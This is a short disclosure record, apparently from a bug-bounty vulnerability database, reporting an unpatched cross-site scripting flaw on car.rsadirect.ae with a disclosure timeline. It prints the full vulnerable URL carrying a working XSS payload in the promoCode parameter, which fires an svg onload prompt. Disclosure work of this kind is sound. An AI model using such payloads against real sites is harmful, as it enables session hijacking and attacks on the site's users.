logo
DATABASE RESOURCES PRICING ABOUT US

car.rsadirect.ae XSS vulnerability

Description

##### Vulnerable URL: https://car.rsadirect.ae/QuoteAndBuy/CarStep1.do?promoCode=%3C/title%3E%3C/script/%22-alert%280%29-%22--%3E%22%3E%3Csvg/onload=prompt%28/OPENBUGBOUNTY/%29%3E ##### Details: Description| Value ---|--- Patched:| No Latest check for patch:| 27.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated VIP website status:| No Check car.rsadirect.ae SSL connection:| (Grade: C+) ##### Coordinated Disclosure Timeline: Description| Value ---|--- Vulnerability submitted via Open Bug Bounty| 26 May, 2016 15:00 GMT Generic security notifications sent to website owner| 26 May, 2016 15:02 GMT Vulnerability details disclosed by researcher| 18 August, 2016 15:12 GMT